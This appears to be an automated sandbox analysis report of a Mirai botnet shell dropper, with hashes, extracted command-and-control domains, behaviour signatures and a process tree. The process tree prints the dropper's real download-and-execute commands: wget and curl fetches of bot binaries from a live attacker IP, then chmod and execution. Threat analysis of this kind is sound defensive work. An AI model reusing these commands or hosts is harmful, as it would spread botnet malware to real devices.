Analysis

  • max time kernel
    148s
  • max time network
    160s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    29-12-2024 21:37

General

  • Target

    51.79.141.121-sora.sh-2024-12-29T211113.sh

  • Size

    2KB

  • MD5

    0569b09a5951d5fe444efa1892b87687

  • SHA1

    0d3df40a37ec718be33d83c1c9a962e982a51d17

  • SHA256

    6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa

  • SHA512

    fbdf5cd3d7ee86f61d205e2745661444152304f594c73562a5b7d59adfdfed3adadbb59954afb7618f64d29e283ef15e1dfaf82cef3a79dc74c08cda5580b11d

Malware Config

Extracted

Family

mirai

Botnet

CONDI

C2

botnet.tfmobile.store

report.tfmobile.store

Extracted

Family

mirai

Botnet

CONDI

C2

botnet.tfmobile.store

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (33395) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 14 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 14 IoCs
  • Modifies Watchdog functionality 1 TTPs 10 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 4 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Writes file to system bin folder 5 IoCs
  • Changes its process name 5 IoCs
  • Checks CPU configuration 1 TTPs 14 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads system network configuration 1 TTPs 4 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 28 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 24 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh
    /tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh
    1⤵
    • Writes file to tmp directory
    PID:638
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.x86
      2⤵
      • Writes file to tmp directory
      PID:640
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:667
    • /bin/cat
      cat botx.x86
      2⤵
        PID:689
      • /bin/chmod
        chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.x86 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV
        2⤵
        • File and Directory Permissions Modification
        PID:691
      • /tmp/robben
        ./robben Payload
        2⤵
        • Executes dropped EXE
        PID:692
      • /usr/bin/wget
        wget http://51.79.141.121/where/botx.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:694
      • /usr/bin/curl
        curl -O http://51.79.141.121/where/botx.mips
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:720
      • /bin/cat
        cat botx.mips
        2⤵
        • System Network Configuration Discovery
        PID:735
      • /bin/chmod
        chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV
        2⤵
        • File and Directory Permissions Modification
        PID:736
      • /tmp/robben
        ./robben Payload
        2⤵
        • Executes dropped EXE
        PID:737
      • /usr/bin/wget
        wget http://51.79.141.121/where/botx.x86_64
        2⤵
          PID:741
        • /usr/bin/curl
          curl -O http://51.79.141.121/where/botx.x86_64
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:753
        • /bin/cat
          cat botx.x86_64
          2⤵
            PID:758
          • /bin/chmod
            chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV
            2⤵
            • File and Directory Permissions Modification
            PID:759
          • /tmp/robben
            ./robben Payload
            2⤵
            • Executes dropped EXE
            PID:760
          • /usr/bin/wget
            wget http://51.79.141.121/where/botx.i468
            2⤵
              PID:761
            • /usr/bin/curl
              curl -O http://51.79.141.121/where/botx.i468
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              • Writes file to tmp directory
              PID:762
            • /bin/cat
              cat botx.i468
              2⤵
                PID:763
              • /bin/chmod
                chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.mips botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV
                2⤵
                • File and Directory Permissions Modification
                PID:764
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                PID:765
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.i686
                2⤵
                  PID:766
                • /usr/bin/curl
                  curl -O http://51.79.141.121/where/botx.i686
                  2⤵
                  • Checks CPU configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:767
                • /bin/cat
                  cat botx.i686
                  2⤵
                    PID:768
                  • /bin/chmod
                    chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV
                    2⤵
                    • File and Directory Permissions Modification
                    PID:769
                  • /tmp/robben
                    ./robben Payload
                    2⤵
                    • Executes dropped EXE
                    PID:770
                  • /usr/bin/wget
                    wget http://51.79.141.121/where/botx.mpsl
                    2⤵
                    • Writes file to tmp directory
                    PID:771
                  • /usr/bin/curl
                    curl -O http://51.79.141.121/where/botx.mpsl
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:772
                  • /bin/cat
                    cat botx.mpsl
                    2⤵
                      PID:773
                    • /bin/chmod
                      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV
                      2⤵
                      • File and Directory Permissions Modification
                      PID:774
                    • /tmp/robben
                      ./robben Payload
                      2⤵
                      • Executes dropped EXE
                      PID:775
                    • /usr/bin/wget
                      wget http://51.79.141.121/where/botx.arm4
                      2⤵
                        PID:777
                      • /usr/bin/curl
                        curl -O http://51.79.141.121/where/botx.arm4
                        2⤵
                        • Checks CPU configuration
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:778
                      • /bin/cat
                        cat botx.arm4
                        2⤵
                          PID:779
                        • /bin/chmod
                          chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV
                          2⤵
                          • File and Directory Permissions Modification
                          PID:780
                        • /tmp/robben
                          ./robben Payload
                          2⤵
                          • Executes dropped EXE
                          PID:781
                        • /usr/bin/wget
                          wget http://51.79.141.121/where/botx.arm5
                          2⤵
                          • Writes file to tmp directory
                          PID:782
                        • /usr/bin/curl
                          curl -O http://51.79.141.121/where/botx.arm5
                          2⤵
                          • Checks CPU configuration
                          • Reads runtime system information
                          • Writes file to tmp directory
                          PID:785
                        • /bin/cat
                          cat botx.arm5
                          2⤵
                            PID:786
                          • /bin/chmod
                            chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV
                            2⤵
                            • File and Directory Permissions Modification
                            PID:787
                          • /tmp/robben
                            ./robben Payload
                            2⤵
                            • Executes dropped EXE
                            PID:788
                          • /usr/bin/wget
                            wget http://51.79.141.121/where/botx.arm6
                            2⤵
                            • Writes file to tmp directory
                            PID:789
                          • /usr/bin/curl
                            curl -O http://51.79.141.121/where/botx.arm6
                            2⤵
                            • Checks CPU configuration
                            • Reads runtime system information
                            • Writes file to tmp directory
                            PID:790
                          • /bin/cat
                            cat botx.arm6
                            2⤵
                              PID:791
                            • /bin/chmod
                              chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben systemd-private-28ae05ef479d496cab3d3307725cca8b-systemd-timedated.service-6IOfHV
                              2⤵
                              • File and Directory Permissions Modification
                              PID:792
                            • /tmp/robben
                              ./robben Payload
                              2⤵
                              • Executes dropped EXE
                              PID:793
                            • /usr/bin/wget
                              wget http://51.79.141.121/where/botx.arm7
                              2⤵
                              • Writes file to tmp directory
                              PID:794
                            • /usr/bin/curl
                              curl -O http://51.79.141.121/where/botx.arm7
                              2⤵
                              • Checks CPU configuration
                              • Reads runtime system information
                              • Writes file to tmp directory
                              PID:800
                            • /bin/cat
                              cat botx.arm7
                              2⤵
                                PID:801
                              • /bin/chmod
                                chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben
                                2⤵
                                • File and Directory Permissions Modification
                                PID:802
                              • /tmp/robben
                                ./robben Payload
                                2⤵
                                • Executes dropped EXE
                                • Modifies Watchdog functionality
                                • Writes file to system bin folder
                                • Changes its process name
                                PID:803
                              • /usr/bin/wget
                                wget http://51.79.141.121/where/botx.ppc
                                2⤵
                                • Writes file to tmp directory
                                PID:805
                              • /usr/bin/curl
                                curl -O http://51.79.141.121/where/botx.ppc
                                2⤵
                                • Checks CPU configuration
                                • Reads runtime system information
                                • Writes file to tmp directory
                                PID:806
                              • /bin/chmod
                                chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.x86 botx.x86_64 robben
                                2⤵
                                • File and Directory Permissions Modification
                                PID:808
                              • /tmp/robben
                                ./robben Payload
                                2⤵
                                • Executes dropped EXE
                                • Modifies Watchdog functionality
                                • Enumerates active TCP sockets
                                • Writes file to system bin folder
                                • Changes its process name
                                • Reads system network configuration
                                PID:809
                              • /usr/bin/wget
                                wget http://51.79.141.121/where/botx.ppc440fp
                                2⤵
                                  PID:815
                                • /usr/bin/curl
                                  curl -O http://51.79.141.121/where/botx.ppc440fp
                                  2⤵
                                  • Checks CPU configuration
                                  • Reads runtime system information
                                  • Writes file to tmp directory
                                  PID:816
                                • /bin/chmod
                                  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 robben
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:818
                                • /tmp/robben
                                  ./robben Payload
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies Watchdog functionality
                                  • Enumerates active TCP sockets
                                  • Writes file to system bin folder
                                  • Changes its process name
                                  • Reads system network configuration
                                  PID:819
                                • /usr/bin/wget
                                  wget http://51.79.141.121/where/botx.m68k
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:823
                                • /usr/bin/curl
                                  curl -O http://51.79.141.121/where/botx.m68k
                                  2⤵
                                  • Checks CPU configuration
                                  • Reads runtime system information
                                  • Writes file to tmp directory
                                  PID:826
                                • /bin/chmod
                                  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 robben
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:828
                                • /tmp/robben
                                  ./robben Payload
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies Watchdog functionality
                                  • Enumerates active TCP sockets
                                  • Writes file to system bin folder
                                  • Changes its process name
                                  • Reads system network configuration
                                  PID:831
                                • /usr/bin/wget
                                  wget http://51.79.141.121/where/botx.sh4
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:833
                                • /usr/bin/curl
                                  curl -O http://51.79.141.121/where/botx.sh4
                                  2⤵
                                  • Checks CPU configuration
                                  • Reads runtime system information
                                  • Writes file to tmp directory
                                  PID:834
                                • /bin/chmod
                                  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.sh4 botx.x86 botx.x86_64 robben
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:840
                                • /tmp/robben
                                  ./robben Payload
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies Watchdog functionality
                                  • Enumerates active TCP sockets
                                  • Writes file to system bin folder
                                  • Changes its process name
                                  • Reads system network configuration
                                  PID:841

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • /tmp/botx.x86

                                Filesize

                                50KB

                                MD5

                                1092f7846a6ca7a5e92ece0ea93ff82e

                                SHA1

                                140fd3e84c49d382e6b0f9a40730d1cd465f8347

                                SHA256

                                a5ddb64df4b96bfeae6860981f98b4845df83db34ffaf238548bede6067f15c2

                                SHA512

                                11ba6cdfba1784d5f2895f351def8d6a4dc0d5efd56b735978d1ff7416d2a52da07931250f37311362c8d522f7db89e3ac8bf1de890302afa6281ce2a2f6b2ba

                              • /tmp/robben

                                Filesize

                                71KB

                                MD5

                                b5aeba1a09f5198a71db73371f6e01b6

                                SHA1

                                246b98370fdf429e94ab4ca087828acabbbebd9c

                                SHA256

                                7a81d936e21b859c70565eddf8e6e50658f6dff077a53adb0ec3cf313ce9f71f

                                SHA512

                                68db247b59d9fe3e030d56e48f2032c6e0d4bf203aef4e850da7dcda7185e60370fa577f2b97f9b6026b0599ae35ecca9fb48c8ace300d9820fb6a16b5722c57

                              • /tmp/robben

                                Filesize

                                215B

                                MD5

                                0797a2600ddc5e8572bfb37b8af0aa29

                                SHA1

                                4f7fc88100b7896f12d953c0b7dd18f516e573d1

                                SHA256

                                1f1fe3f0ef586643c0c73185c744b40b31c4241a90a30a0880c866dbc04fe538

                                SHA512

                                0298488cf573edce6fa015e17439f3ed66285dfc5b908017e95c3a71f44f1f1949a64f69cb1ac8b64cb9e8c28c15ca0b35e8cd04265ffcae3f736f7151ef6dec

                              • /tmp/robben

                                Filesize

                                213B

                                MD5

                                51b807212d0b7e7a9a37e4536b2d0133

                                SHA1

                                f130ad0c7f78e1a99f76ed36c003cb5cac871843

                                SHA256

                                94bf03444a7262f62fc6b9ca294b0cdb3bcf96d03fe1d5bdf286ddea26759c11

                                SHA512

                                a86a291fbeeeae74466791679a9a22e9224a03e3a625676d678e9a11ca887c792ba8496dbac6e40fd3b289258698d7c5b882f33c89630532f7570de16bffd2e4

                              • /tmp/robben

                                Filesize

                                213B

                                MD5

                                033d284ddf80a0d366e8d7543fc26df4

                                SHA1

                                fe4845a1d864f47c5d0e330a8fd9eaf7759aa9f5

                                SHA256

                                f45f2580c1af1c5c96a1aa6a312b2079c21c1b929f418b91d9bf323a57f89aa8

                                SHA512

                                e58e6f5200b6a9022c93da8d13a1a2bf2b50ad6fd5f1144e9979ae66adf9a441a796adebdd9cef942abeadb8ed42a5242c24dca330cb77730269233ff8839fb2

                              • /tmp/robben

                                Filesize

                                128KB

                                MD5

                                e1fbfe1054d3fa3e6d193c60670427b8

                                SHA1

                                d1b7c7f9169f7d34b7b219cb70e512a07dbded88

                                SHA256

                                60f7fc62b760c105480589c7219290c4778c85520f5e1f6e0f654656989f9cdb

                                SHA512

                                595083014a6e15cec0f72838eea47b5beadc20997d65d39c6e331724dc9286095a8668022d0836fff769477f8b265ac10a5067826594768bc220bce456b82843